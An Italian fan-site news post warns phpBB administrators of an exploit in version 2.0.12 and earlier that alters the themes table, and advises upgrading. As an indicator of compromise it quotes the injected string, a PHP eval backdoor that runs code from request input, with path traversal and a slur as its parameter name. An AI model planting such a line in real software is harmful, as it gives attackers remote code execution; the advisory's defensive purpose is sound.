PHP-Nukefordonkeys.com - News - Sicurezza - Vulnerabilitā phpbb
. ::  NukeSentinel(tm) 2.6.00  ::  Defacciati i siti ICANN e IANA  ::  Il tuo sito nella Storia PHPNuke!  ::  Estate e Sicurezza  ::  Tuttosoft.it Cambia faccia ::.
Benvenuto su PHP-Nukefordonkeys.com Donkeys76 Mercatino 1200Temi Manuale
 
Benvenuto su PHP-Nukefordonkeys.com

  Iscriviti! E' Gratis!                                                                                                   
La Tua WebAgency


Menu Generale
Home
News
Mappa del Sito
Recensioni
Trova Tutto
Utenti
Forums
Downloads
Contatti
Promo Tuo Sito
Tutorials
Speciali
Manuali
PHPNuke Tools
Utility
Gallerie
Nuke Shopping
Documenti

Recensioni Siti
·MemHT.com
·Corvoingordo.com

MySQL Facile

**************
·Ricette cucina Gratis
·Investire Forex
·Prestiti Mutuo
·Dieta personalizzata
·casino online
·Torrents
·Sfrutta meglio il web
·Guida casino online
·Prestito auto




NEWS

 Leggi News  Invia News  Argomenti  Archivio Articoli  Ritorno al Futuro

Sicurezza

Vulnerabilitā phpbb
Stampa Stampa Invia Invia Mobile Mobile

Ragazzi navigando quā e la ho trovato questa news che potrā interessarvi.
E' stato reso noto un exploit che permette di attaccare la tabella phpbb_themes utilizzata dai forum phpbb per gestire i temi.
Versioni vulnerabili : La versione 2.0.12 e tutte le versioni precedenti.
Questo exploit riesce ad acquisire i diritti di amministrazione (sfruttando un "errore di programmazione") che utilizza per modificare il tema del forum.
Cosa vede l'amministratore di un forum hackerato?
In seguito a questo attacco l'amministratore vedrā nella sezione "gestione stili/temi" tutti i temi cancellati tranne quello di default, che verrā impostato come tema corrente. Sempre in questo pannello l'amministratore vedrā la seguente stringa: Codice:
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../
../../../../../../../tmp

oltre a quella dello stile di default.
Se vedete la stringa riportata sopra nel vostro pannello č una chiara indicazione che il vostro forum č stato attaccato utilizzando l'exploit in questione.
Soluzione : Per impedire di essere attaccati da questo exploit basta aggiornare alla versione 2.0.13.
Nota del Webmaster
: il consiglio č di aggiornare alla 2.0.15 perchč nel frattempo anche e precedenti versioni sono diventate attaccabili.

(_-PaKi-_ - Sabato, 04 giugno ore 22,06 )

Articolo...........................Vulnerabilitā phpbb
Login/Crea AccountCommenti ricevuti..........0 commenti

Vuoi commentare questo articolo?
Puoi lasciare un tuo commento su questo articolo cliccando sul bottone qui sotto. I commenti sono di proprietà dell'inserzionista pertanto decliniamo ogni responsabilitā per il loro contenuto.



Commenti NON Abilitati per gli Anonimi, registrati



 
Links Correlati
· Altro su: Sicurezza
· News by rinok


Articolo più letto relativo a Sicurezza:
Bug pericoloso su index.php


Votazione Articolo
Media Punteggio: 0
Voti: 0

Per favore vota
per questo articolo:

Eccellente
Ottimo
Buono
Normale
Scarso





^ torna su ^


Scopri come ricevere gratuitamente sul tuo cellulare le nostre news




Siti consigliati: Webisland - Weblord - Tiempolibresite - jugo - Sfondi Gratuiti - pcprimipassi - aliek - tweakness - Script e Manuali - net-free - Manuali - HardwareMax - Web Promotion - Directory - Tuttosoft.it - Mondoroms - GBComputer -
Network: PHP Nuke Maximus - 1 Million Free Games - 1 Million Nuke Pixel - Corvoingordo - Ingegneria Gestionale - Torre del Greco - Testi ed Accordi gratis

Generazione pagina: 0.17 Secondi